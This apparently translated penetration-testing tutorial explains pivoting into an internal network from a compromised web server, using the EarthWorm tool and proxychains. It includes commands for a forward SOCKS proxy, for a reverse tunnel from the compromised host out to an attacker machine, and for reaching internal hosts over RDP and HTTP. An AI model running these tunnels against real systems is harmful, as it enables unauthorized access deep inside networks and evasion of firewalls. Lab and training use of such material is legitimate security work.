Table of contents
In the penetration test, when we obtained a certain authority of the external network server (such as web server, ftp server, mali server, etc.), we found that this server can directly or indirectly access the internal network. At this time, the penetration test enters the post-penetration stage. Generally, other machines in the internal network are not allowed to access from external network machines. At this time, we can use port forwarding (tunnel) or set this external network server as a proxy, so that our own attacking machine can directly access and operate other machines in the internal network. The means to achieve this process is called intranet forwarding.
EW (EarthWorm) combined with proxychains proxy chain
EW is a set of portable network penetration tools, with two core functions of SOCKS5 service erection and port forwarding, which can complete network penetration in complex network environments. This tool can open up a network tunnel by means of "forward", "reverse", and "multi-level cascading" to reach the depths of the network, break through network restrictions with the unique means of earthworms, and loosen soil for firewalls. A variety of executable files are provided in the toolkit to suit different operating systems. Linux, Windows, MacOS, and Arm-Linux are all included. It is highly recommended to use, cross-platform, and any platform can be easily used!
Now there is such an environment, we have obtained the authority of the web server located in the public network, and there is another host in the intranet, and now we need to set the web server of the public network as a proxy to access and detect the information of the intranet host.
EW forward proxy
Web server settings
Set EW to listen to local port 1080
ew_for_Win.exe -s ssocksd -l 1080
l
Linux host settings Configure
the configuration file of the proxychains proxy chain, set the proxy to port 1080 of 192.168.137.128: socks5 192.168.137.128 1080
vim /etc/proxychains4.conf
and then add proxychains before the command, such as remote desktop connection to the host in the intranet 192.168.52.143
proxychains rdesktop 192.168.52.143
EW reverse proxy
Web server settings
Set EW to forward all traffic of this machine to port 8888 of 192.168.137.129
ew_for_Win.exe -s rssocks -d 192.168.137.129 -e 8888
Linux host settings
Set ew to forward the traffic of port 8888 of this machine to port 1080,
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
then configure the configuration file of proxychains proxy chain, set the proxy to port 1080 of 127.0.0.1: socks5 127.0.0.1 1080
and then add proxychains before the command That's fine, for example, the remote desktop connects to the host 192.168.52.143 in the intranet
proxychains rdesktop 192.168.52.143
to access the web service opened on the intranet host 192.168.52.143
proxychains curl http://192.168.52.143/yxcms/
